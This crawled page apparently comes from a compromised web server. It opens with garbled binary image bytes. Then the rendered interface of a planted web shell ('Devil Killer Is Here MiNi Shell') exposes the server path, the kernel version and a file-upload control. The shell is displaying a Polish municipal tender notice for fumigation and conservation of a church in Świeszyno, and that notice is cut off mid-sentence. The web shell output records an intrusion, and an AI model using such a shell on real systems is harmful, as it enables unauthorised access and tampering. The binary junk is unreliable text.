JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240516/0032727001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie prac konserwatorskich kościoła pw. Narodzenia Najświętszej Maryi Panny w Świeszynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIESZYNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920707</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">71</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świeszyno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 94 31 60 120</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 94 31 61 491</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@swieszyno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.swieszyno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie prac konserwatorskich kościoła pw. Narodzenia Najświętszej Maryi Panny w Świeszynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8c0717e6-136e-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00327270</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00034221/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przeprowadzenie prac konserwatorskich kościoła pw. Narodzenia Najświętszej Maryi Panny w Świeszynie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/swieszyno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Składanie następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym https://platformazakupowa.pl/pn/swieszyno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy OPEN NEXUS dostępnej pod adresem internetowym https://platformazakupowa.pl/pn/swieszyno. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla Wykonawcy na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. Wymagania techniczne związane z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, <br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowane oprogramowanie do obsługi plików w formacie „.pdf” – np. Adobe Acrobat Reader;<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej gmina@swieszyno.pl, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy. Szczegółowy opis zawarto w pkt. 4 rozdz. II SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w pkt. 21 Rozdz. II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.15.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie prac konserwatorskich kościoła pw. Narodzenia Najświętszej Maryi Panny w Świeszynie w zakresie:<br/>1) Etap I – wykonania fumigacji oraz impregnacji owadobójczej i ogniochronnej, w tym między innymi:<br/>a. przygotowanie obiektu – zabezpieczenie i usunięcie z obiektu wszystkich elementów mogących reagować z fumigantami – przede wszystkim obiektów metalowych zawierających miedź i związki miedzi, srebro, złoto oraz inne metale szlachetne; należy zabezpieczyć instalacje elektryczne oraz system monitoringu p.poż. i antywłamaniowego, w tym zdemontować czujki; zabezpieczenie instalacji elektrycznej musi przebiegać pod nadzorem Zamawiającego – elementy, których nie można usunąć z obiektu, należy zabezpieczyć foliami gazoszczelnymi.<br/>b. wstępne odczyszczenie elementów konstrukcyjnych – odkurzenie, usunięcie większych nalotów i zabrudzeń (z wyłączeniem oczyszczania mechanicznego np. szlifowania lub skrobania) pod nadzorem Zamawiającego, usunięcie wszystkich luźnych elementów.<br/>c. uszczelnienie obiektu - przygotowanie szczelnego namiotu z folii gazoszczelnej, poszczególne fragmenty folii sklejone taśmą, na styku z ziemią uszczelnienie poprzez wkopanie folii w grunt; w razie konieczności wykonanie stelażu wokół budynku pod folię; sprawdzenie szczelności namiotu.<br/>d. zabezpieczenie terenu wokół obiektu – taśmy, barierki odgradzające teren, rozmieszczenie oznakowania ostrzegawczego, informacyjnego: „zakaz wstępu i zbliżania”, „uwaga”, „niebezpieczeństwo”; ze względu na specyfikę sposobu użytkowania terenu wokół budynku, wygrodzenie należy ograniczyć wyłącznie do przestrzeni niezbędnej, wymaganej przepisami bezpieczeństwa;<br/>e. przy zabezpieczeniu obiektu i terenu, a także podczas prowadzenia prac nie można uszkodzić istniejącej zieleni wysokiej w sąsiedztwie obiektu; wszelkie konieczne przycinki można przeprowadzić wyłącznie w porozumieniu z Zamawiającym;<br/>f. odcięcie dopływu prądu i gazu;<br/>g. równomierne rozłożenie fumigantów wewnątrz budynku;<br/>h. kontrola procesu gazowania i szczelności namiotu;<br/>i. ostrożne odgazowywanie obiektu, usunięcie namiotu oraz produktów ubocznych gazowania i ich utylizacja;<br/>j. oczyszczenie i staranne odkurzenie elementów drewnianych: ścian, podłóg, stropów, elementów konstrukcyjnych więźby dachowej z wszelkich zanieczyszczeń powierzchniowych, pozostałego kurzu, brudu (z wyłączeniem oczyszczania mechanicznego np. szlifowania lub skrobania);<br/>k. impregnacja ochronna wewnątrz i na zewnątrz preparatem owadobójczym dopuszczonym do stosowania przy zabytkach drewnianych i w obiektach przeznaczonych na pobyt ludzi, nieposiadającym właściwości łatwopalnych; impregnacji będą podlegały wszystkie elementy drewniane, konstrukcje ścian (podwaliny, belki), konstrukcja dachowa (krokwie i łaty), stolarka drzwiowa i okienna, podłogi oraz inne elementy drewniane nie pokryte lakierami i innymi substancjami nie przepuszczającymi impregnatu;<br/>l. impregnacja ogniochronna preparatem ogniochronnym dopuszczonym do stosowania przy zabytkach drewnianych i w obiektach przeznaczonych na pobyt ludzi;<br/>m. wykonanie dokumentacji powykonawczej zawierającej miedzy innymi: fotografie z kluczowych elementów realizacji, sprawozdanie z wykonanych prac wraz z zestawieniem użytych materiałów, dostarczeniem atestów i kart technicznych, podaniem ilości zastosowanego środka fumigującego oraz wskazaniem na planie obiektu punktów jego rozmieszczenia, podaniem ilości zastosowanego środka impregnującego oraz wskazaniem na planie obiektu elementów poddanych impregnacji.<br/>2) Etap II – wykonania renowacji trojga drzwi drewnianych, w tym między innymi:<br/>a. wykonanie dokumentacji fotograficznej i opisowej stanu zachowania drzwi przed przystąpieniem do prac konserwatorskich;<br/>b. usunięcie powłok lakierowych z powierzchni drewna - metodą mechaniczną, wspomagane metodą chemiczną;<br/>c. w razie konieczności impregnacja wzmacniająca osłabionych partii drewna;<br/>d. uzupełnienie ubytków w drewnie;<br/>e. impregnacja ochronna preparatem owadobójczym dopuszczonym do stosowania przy zabytkach drewnianych i w obiektach przeznaczonych na pobyt ludzi;<br/>f. impregnacja ogniochronna preparatem ogniochronnym dopuszczonym do stosowania przy zabytkach drewnianych i w obiektach przeznaczonych na pobyt ludzi;<br/>g. wykonanie dokumentacji powykonawczej zawierającej miedzy innymi: fotografie z kluczowych elementów realizacji, sprawozdanie z wykonanych prac wraz z zestawieniem użytych materiałów, dostarczeniem atestów i kart technicznych, podaniem ilości zastosowanego środka impregnującego oraz wskazaniem na planie obiektu elementów poddanych impregnacji.<br/>3) Zamawiający dopuszcza zastosowanie impregnatu wielofunkcyjnego dopuszczonego do stosowania przy zabytkach drewnianych i w obiektach przeznaczonych na pobyt ludzi;<br/>4) uzyskanie wszystkich niezbędnych określonych przepisami prawa: uzgodnień, opinii, operatów, raportów, decyzji, warunków technicznych itp.;<br/>5) opracowanie dokumentacji (programów prac konserwatorskich) oraz uzyskanie decyzji Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków – przed złożeniem programów prac konserwatorskich do Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków należy uzyskać akceptację Zamawiającego (w przypadku braku akceptacji i wniesieniu uwag przez Zamawiającego należy wprowadzić uwagi do dokumentacji i ponownie złożyć do akceptacji do Zamawiającego);<br/>6) programy prac konserwatorskich mają spełniać wymogi określone w niniejszym opisie przedmiotu zamówienia oraz w przepisach prawnych, normach, normatywach, kategoriach, wytycznych i innych, niezbędnych przy realizacji zamówienia, obowiązujących w dniu przekazania dokumentacji Zamawiającemu.<br/>7) wszelkie koszty poniesione w związku z czynnościami niezbędnymi dla prawidłowego wykonania dokumentacji (programów prac konserwatorskich) ponosi wykonawca i powinny być uwzględnione w cenie oferty.<br/>8) uzyskanie w imieniu Zamawiającego decyzji o pozwoleniu na budowę/zgłoszenia robót nie wymagających pozwolenia na budowę (jeżeli będzie wymagane);<br/>9) w przypadku dokonania zgłoszenia robót nie wymagających pozwolenia na budowę należy przekazać Zamawiającemu zaświadczenie organu, że nie wniósł sprzeciwu do zamierzania budowlanego (jeżeli będzie wymagane);<br/>10) przekazywanie na żądanie Zamawiającego pisemnej informacji o stanie zaawansowania prac;<br/>Zadanie realizowana będzie ze środków Rządowego Programu Odbudowy Zabytków oraz z budżetu Gminy Świeszyno.<br/><br/>Przed złożeniem oferty wykonawcy mogą przeprowadzić wizję lokalną w terenie zgodnie z pkt. 3.6. rozdz I SWZ.<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w ust. 3 Rozdz. I Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90921000-9 - Usługi dezynfekcji i dezynsekcji budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90922000-6 - Usługi zwalczania szkodników</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty wg następujących kryteriów: 1) Cena - waga 60% (max 60 pkt.)., B. Gwarancja– waga 40% (max 40 pkt.)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.1 Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje żadnych warunków w tym zakresie.<br/>1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów-<br/>Zamawiający nie precyzuje żadnych warunków w tym zakresie.<br/>1.3 sytuacji finansowej lub ekonomicznej:<br/>Zamawiający nie precyzuje żadnych warunków w tym zakresie.<br/>1.4 zdolności technicznej lub zawodowej<br/>W celu wykazania spełniania warunku dotyczącego wiedzy i doświadczenia Wykonawca winien wykazać:<br/>a) że posiada doświadczenie zawodowe, legitymując się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 usług polegających na wykonaniu usługi „fumigacji” zabytków objętych ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych lub ujętych w gminnej ewidencji zabytków, w tym min. 1 usługa dotycząca zabiegów fumigacji gdzie wykonywano uszczelnienie zewnętrzne całego dachu budynku lub całego budynku.<br/>b) dysponuje co najmniej następującymi osobami, które będą skierowane do realizacji przedmiotowego zamówienia publicznego jako kierownik prac:<br/>- co najmniej 1 osobą posiadającą zaświadczenie o ukończeniu szkolenia w zakresie stosowania środków ochrony roślin metodą fumigacji – zgodnie z Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 08 maja 2013 r., oraz doświadczenie w postaci wykonania co najmniej 2 usług polegających na &#34;fumigacji” zabytków objętych ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych lub ujętych w gminnej ewidencji zabytków Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonych dokumentów wg formuły spełnia – nie spełnia.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik do SWZ nr 5;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W przypadku składania oferty przez wspólników spółki cywilnej dokumenty wymienione w pkt 1 muszą być złożone oddzielnie dla każdego ze wspólników oraz dla spółki cywilnej.<br/>DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:<br/>Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt. B niniejszej SWZ składa:<br/>1) dokument, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Informacja i dokument o którym mowa w pkt.1 powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem. Pozostałe oświadczenia/dokumenty wymagane w prowadzonym postępowaniu, Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa takie same jak Wykonawca polski. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (z zachowaniem terminu odpowiednio 3 miesiące przed ich złożeniem).<br/>Wszystkie dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie spełnienia warunków udziału w postępowaniu:<br/>1) zdolności technicznej lub zawodowej potwierdzonej:<br/>a) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, spełniające wymagania określone w punkcie 1.4a Rozdz. II SWZ, sporządzony na/wg załącznika do SWZ nr 7.<br/>b) wykaz potencjału technicznego dostępnego wykonawcy w celu wykonana zamówienia publicznego, wraz z informacją o podstawie do dysponowania tymi zasobami - spełniającego wymagania określone w punkcie 1.4b Rozdz. II SWZ sporządzony na/wg załącznika do SWZ nr 8.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert, wykonawca zobowiązany jest złożyć Zamawiającemu ofertę zawierającą:<br/>1) Formularz oferty (sporządzony wg wzoru stanowiącego załącznik do SWZ nr 2,<br/>2) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp - pkt. 3.A1 SWZ (sporządzone wg wzoru stanowiącego załącznik do SWZ nr 3 i 4),<br/>3) Oświadczenie, o którym mowa w art. 117 